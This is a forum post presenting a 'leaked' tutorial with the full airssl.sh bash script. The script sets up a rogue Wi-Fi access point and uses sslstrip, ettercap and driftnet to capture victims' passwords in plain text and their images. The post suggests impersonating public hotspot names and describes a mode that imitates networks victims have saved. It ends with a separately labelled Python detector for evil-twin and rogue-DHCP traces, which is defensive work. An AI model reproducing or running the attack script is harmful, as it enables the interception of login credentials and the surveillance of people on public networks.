MARATHI TEAM
[Leaked] Learn How to setup a fake wireless access point {Hot}


Post by slowdeath on Sun Jan 06, 2013 4:20 am

So in this thread I will teach you how to set up a fake wireless access point to capture passwords! So let's begin!
First of all you will need a script called airssl.sh and at least 1 wireless network interface card!
So right click on your desktop on BC5 and click create new document > empty file and name it airssl.sh.
Then paste the following code in it, save it and close it.

Code:
#!/bin/bash
# ©opyright 2009 - killadaninja - Modified G60Jon 2010
# airssl.sh - v1.0
# visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

# Network questions
echo
echo "AIRSSL 2.0 - Credits killadaninja & G60Jon "
echo
route -n -A inet | grep UG
echo
echo
echo "Enter the networks gateway IP address, this should be listed above. For example 192.168.0.1: "
read -e gatewayip
echo -n "Enter your interface that is connected to the internet, this should be listed above. For example eth1: "
read -e internet_interface
echo -n "Enter your interface to be used for the fake AP, for example wlan0: "
read -e fakeap_interface
echo -n "Enter the ESSID you would like your rogue AP to be called: "
read -e ESSID
airmon-ng start $fakeap_interface
fakeap=$fakeap_interface
fakeap_interface="mon0"

# Dhcpd creation
mkdir -p "/pentest/wireless/airssl"
echo "authoritative;

default-lease-time 600;
max-lease-time 7200;

subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;

option domain-name "\"$ESSID\"";
option domain-name-servers 10.0.0.1;

range 10.0.0.20 10.0.0.50;

}" > /pentest/wireless/airssl/dhcpd.conf

# Fake ap setup
echo "[+] Configuring FakeAP...."
echo
echo "Airbase-ng will run in its most basic mode, would you like to
configure any extra switches? "
echo
echo "Choose Y to see airbase-ng help and add switches. "
echo "Choose N to run airbase-ng in basic mode with your chosen ESSID. "
echo "Choose A to run airbase-ng in respond to all probes mode (in this mode your chosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and slave will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY. "
echo "Y, N or A "

read ANSWER

if [ $ANSWER = "y" ] ; then
airbase-ng --help
fi

if [ $ANSWER = "y" ] ; then
echo
echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be
redefined, also in this mode you MUST define a channel "
read -e aswitch
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi

if [ $ANSWER = "a" ] ; then
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
sleep 2
fi

if [ $ANSWER = "n" ] ; then
echo
echo "[+] Starting FakeAP..."
xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
sleep 2
fi

# Tables
echo "[+] Configuring forwarding tables..."
ifconfig lo up
ifconfig at0 up &
sleep 1
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

# DHCP
echo "[+] Setting up DHCP..."
touch /var/run/dhcpd.pid
chown dhcpd:dhcpd /var/run/dhcpd.pid
xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" at0 & dchpid=$!
sleep 3

# Sslstrip
echo "[+] Starting sslstrip..."
xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
sleep 2

# Ettercap
echo "[+] Configuring ettercap..."
echo
echo "Ettercap will run in its most basic mode, would you like to
configure any extra switches for example to load plugins or filters,
(advanced users only), if you are unsure choose N "
echo "Y or N "
read ETTER
if [ $ETTER = "y" ] ; then
ettercap --help
fi

if [ $ETTER = "y" ] ; then
echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
For the sake of airssl, ettercap WILL USE -u and -p so you are advised
NOT to use -M, also -i is already set and CANNOT be redefined here.
Ettercaps output will be saved to /pentest/wireless/airssl/passwords
DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
echo
read "eswitch"
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
sleep 1
fi

if [ $ETTER = "n" ] ; then
echo
echo "[+] Starting ettercap..."
xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
sleep 1
fi

# Driftnet
echo
echo "[+] Driftnet?"
echo
echo "Would you also like to start driftnet to capture the victims images,
(this may make the network a little slower), "
echo "Y or N "
read DRIFT

if [ $DRIFT = "y" ] ; then
mkdir -p "/pentest/wireless/airssl/driftnetdata"
echo "[+] Starting driftnet..."
driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
sleep 3
fi

xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!

clear
echo
echo "[+] Activated..."
echo "Airssl is now running, after slave connects and surfs their credentials will be displayed in ettercap. You may use right/left mouse buttons to scroll up/down ettercap's xterm shell, ettercap will also save its output to /pentest/wireless/airssl/passwords unless you stated otherwise. Driftnet images will be saved to /pentest/wireless/airssl/driftnetdata "
echo
echo "[+] IMPORTANT..."
echo "After you have finished please close airssl and clean up properly by hitting Y,
if airssl is not closed properly ERRORS WILL OCCUR "
read WISH

# Clean up
if [ $WISH = "y" ] ; then
echo
echo "[+] Cleaning up airssl and resetting iptables..."

kill ${fakeapid}
kill ${dchpid}
kill ${sslstripid}
kill ${ettercapid}
kill ${dritnetid}
kill ${sslstriplogid}

airmon-ng stop $fakeap_interface
airmon-ng stop $fakeap
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

echo "[+] Clean up successful..."
echo "[+] Thank you for using airssl, Good Bye..."
exit

fi
exit

Once you have done that, right click it, go into the properties and enter these settings:



Now open a terminal and type /root/Desktop/airssl.sh; you should get this:



For me I get:

0.0.0.0 192.168.0.1 0.0.0.0 UG 0 0 0 wlan0
0.0.0.0 192.168.0.1 0.0.0.0 UG 100 0 0 wlan
So I would enter 192.168.0.1 and press enter.
It will now ask you this:

Enter your interface that is connected to the internet, this should be listed above. For example eth1:
So mine is wlan0 and wlan, meaning I'm on a wireless network, so enter what is listed above.
So now it will ask you to enter this:

Enter your interface to be used for the fake AP, for example wlan0:
So again I have to enter wlan0; however, if you're unsure you can open up a separate terminal and type:

airmon-ng
So as you can see I get wlan0 again, so I will enter that.
It now asks you to enter the ESSID to be used for your rogue AP. This is basically the name that you see of an access point. In the UK we have something called BT-OPENZONE, which is a load of free wireless networks in public, so I would call it something along the lines of BT-OpenZone453; however, you could call it:
MacDonalds Registered Hotspot
Starbucks Public Wifi
Terminal X
etc... Note that your name can have spaces in it.
Now press enter and our next question is displayed:


Code:
Airbase-ng will run in its most basic mode, would you like to
configure any extra switches?

Choose Y to see airbase-ng help and add switches.
Choose N to run airbase-ng in basic mode with your chosen ESSID.
Choose A to run airbase-ng in respond to all probes mode (in this mode your chosen ESSID is not used, but instead airbase-ng responds to all incoming probes), providing victims have auto connect feature on in their wireless settings (MOST DO), airbase-ng will imitate said saved networks and slave will connect to us, likely unknowingly. PLEASE USE THIS OPTION RESPONSIBLY.
Y, N or A


For this tutorial we will keep to the basics and say n.
It will continue to execute the commands and then pop up with another question:


Code:
Ettercap will run in its most basic mode, would you like to
configure any extra switches for example to load plugins or filters,
(advanced users only), if you are unsure choose N
Y or N

Again, to keep it basic, enter N and continue.
One final question is next and it asks you:

Code:
Would you also like to start driftnet to capture the victims images,
(this may make the network a little slower)
Y or N

Here is where you decide what to do. If you press Y then obviously images of the victims connected to the network will be saved to /pentest/wireless/airssl/driftnetdata; this is obviously a bonus but will slow the network down!
OK, so now press enter and if you set it up right you should see this screen:




Now, using a different PC or a VM, scan for networks and connect to your fake AP. Now look up a site that uses SSL for their login, and simply register and log in! The passwords will be displayed in ettercap's xterm shell in plain text!


I hope you enjoyed this tutorial. I got the script and tutorial basis from here; also, it's not copypasta.
slowdeath
Owner

Posts : 216
Points : 591
Reputation : 0
Join date : 2012-12-03
Age : 24
Location : delhi
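From the defender's side, as an added example that is not part of the original post or of airssl.sh: a small detector, run over constructed beacon and DHCP OFFER records with hypothetical allowlists, that flags the artefacts the setup above leaves on the network: a known ESSID beaconing from a BSSID you do not own (the "respond to all probes" mode), a DHCP OFFER from a server that is not on the inventory, a lease pointing clients at a gateway inside the 10.0.0.0/24 pool the script's dhcpd.conf hard-codes, and a domain-name option that carries an SSID instead of a real domain.

```python
import ipaddress
from dataclasses import dataclass
from typing import List, Optional

# Constructed allowlists (hypothetical); in practice they come from the
# wireless controller and the DHCP server inventory.
KNOWN_APS = {"Corp-WiFi": {"00:11:22:33:44:55", "00:11:22:33:44:66"}}
KNOWN_DHCP_SERVERS = {"192.168.0.1"}
KNOWN_DOMAINS = {"corp.example"}
# Address pool hard-coded in the dhcpd.conf that airssl.sh writes.
AIRSSL_POOL = ipaddress.ip_network("10.0.0.0/24")

@dataclass
class Beacon:           # one 802.11 beacon seen by a monitoring sensor
    essid: str
    bssid: str

@dataclass
class DhcpOffer:        # one DHCP OFFER seen by the sensor
    server_ip: str
    router: str
    domain_name: str

def check_beacon(b: Beacon) -> Optional[str]:
    """Evil twin: a known ESSID advertised by a BSSID we do not own."""
    if b.essid in KNOWN_APS and b.bssid.lower() not in KNOWN_APS[b.essid]:
        return f"evil twin: {b.essid} from unknown BSSID {b.bssid}"
    return None

def check_offer(o: DhcpOffer) -> List[str]:
    """Rogue DHCP: unknown server, gateway in the airssl pool, odd domain."""
    findings = []
    if o.server_ip not in KNOWN_DHCP_SERVERS:
        findings.append(f"rogue DHCP server {o.server_ip}")
    if ipaddress.ip_address(o.router) in AIRSSL_POOL:
        findings.append(f"gateway {o.router} inside airssl pool {AIRSSL_POOL}")
    if o.domain_name not in KNOWN_DOMAINS:   # airssl sets this to the rogue ESSID
        findings.append(f"unexpected domain-name {o.domain_name!r}")
    return findings

def scan(beacons: List[Beacon], offers: List[DhcpOffer]) -> List[str]:
    findings = [f for b in beacons if (f := check_beacon(b))]
    for o in offers:
        findings.extend(check_offer(o))
    return findings

# Constructed sample: the real AP, an evil twin, and the lease airssl hands out.
SAMPLE_BEACONS = [Beacon("Corp-WiFi", "00:11:22:33:44:55"), Beacon("Corp-WiFi", "de:ad:be:ef:00:01")]
SAMPLE_OFFERS = [DhcpOffer("192.168.0.1", "192.168.0.1", "corp.example"), DhcpOffer("10.0.0.1", "10.0.0.1", "Corp-WiFi")]
```

Calling scan(SAMPLE_BEACONS, SAMPLE_OFFERS) yields four findings: the twin BSSID plus the three anomalies in the airssl lease.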
